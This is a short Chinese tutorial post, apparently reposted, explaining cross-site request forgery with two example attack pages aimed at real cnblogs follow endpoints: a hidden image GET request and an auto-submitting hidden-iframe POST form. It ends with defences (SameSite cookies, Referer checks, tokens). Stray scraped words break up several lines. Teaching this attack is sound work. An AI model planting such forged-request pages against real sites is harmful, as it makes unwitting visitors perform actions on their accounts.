csrf攻击

时间 2019-11-17

原文原文链接

csrf 是跨站点伪造请求，主要利用发请求，浏览器每次都会自动带上 cookie 这个特色。html

下面咱们看看例子：ajax

例子一：api

若是博客园有一个关注博主的api是get请求的话，那这里我新建一个恶意页面：跨域

<!DOCTYPE html>
<html>
  <head>
    <meta charset="utf-8">
    <title></title>
  </head>
  <body>
    <img src="http://www.cnblogs.com/mvc/Follow/FollowBlogger.aspx?blogUserGuid=18a5f476-18f4-e611-845c-ac853d9f53ac"/>
  </body>
</html>

在访问这个页面那一瞬,img就会跨域get请求这个api，你不知不觉间同时也像博客园这个接口发送了get请求，在你知情的状况下帮你关注了博主浏览器

例子二：cookie

若是这个api不是get而是post呢？那么恶意网站就会尝试经过表单来跨域post请求apimvc

<!--恶意页面主页-->
<!DOCTYPE HTML>
<html lang="en">
<body>
    <iframe src="./form.html" style="display:none"></iframe>
</body>
</html>

<!--iframe-->
<!DOCTYPE html>
<html lang="en">
<body>
    <form action="https://home.cnblogs.com/ajax/follow/followUser" method="post">
    　　<input name="userId" value="18a5f476-18f4-e611-845c-ac853d9f53ac"/>
    　　<input name="remark" value=""/>
    　　<input type="submit" value="提交" />
    </form>
    <script>
        document.querySelector('form').submit();
    </script>
   </body>
</html>

防护措施：post

1. cookie 设置 samesite 属性，不容许跨域传递 cookie网站

2. 检测Referer是不是本站的域名 ------- 最经常使用的了ui

3. 用Token存放在Cookie之外的位置(例如做为get参数、做为自定义Http Header)